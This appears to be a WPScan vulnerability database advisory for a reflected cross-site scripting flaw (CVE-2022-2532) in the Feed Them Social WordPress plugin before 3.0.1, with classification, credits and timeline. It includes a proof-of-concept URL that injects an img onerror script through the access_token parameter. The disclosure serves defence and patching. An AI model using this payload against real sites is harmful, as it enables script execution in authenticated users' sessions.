WordPress Plugin Vulnerabilities

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

Against any authenticated user:

https://example.com/wp-admin/admin-ajax.php?action=fts_encrypt_token_ajax&access_token=%3Cimg%20src=x%20onerror=alert(/XSS/)%3E

Affects Plugins

feed-them-social

Fixed in version 3.0.1

References

CVE

CVE-2022-2532

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

kazet1234

Verified

Yes

WPVDB ID

07278b12-58e6-4230-b2fb-19237e9785d8

Timeline

Publicly Published

2022-07-26 (about 6 months ago)

Added

2022-07-26 (about 6 months ago)

Last Updated

2022-08-25 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin